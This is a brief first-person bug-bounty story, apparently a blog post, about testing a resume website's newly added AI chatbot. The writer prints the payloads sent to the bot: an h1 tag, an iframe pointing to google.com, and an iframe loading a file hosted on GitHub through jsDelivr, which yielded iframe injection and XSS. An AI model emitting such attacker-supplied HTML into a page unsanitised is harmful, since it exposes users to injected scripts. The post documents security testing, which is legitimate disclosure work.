Another story time. Eh!
I found a very popular website which people use it to make resumes. I mailed them a bug (duplicate) and in reply they added me to their hackerone programme.
This was in September.
I tested it for days but nothing. Being an old programme all the corners were checked multiple times already.
On 16 th of December I got a mail saying an AI feature was introduced. I didnt pay much attention as I doubted my skills plus I was testing another one. After 30–45 mins something snapped and I started to throw paylaods at the AI bot :)
When I tested for html injection :
<h1>a</h1>
<iframe src="https://google.com"></iframe>Iframe Injection worked. Then I used jsdelivery cdn to host my payload on github and embeded it in an iframe to get XSS.
Press enter or click to view image in full size
<iframe src="https://cdn.jsdelivr.net/gh/ScarryParrot/testing@3XXXXXXc20/payload9.pdf"></iframe>Although I was in a doubt it being accepted as it do not affect any other users.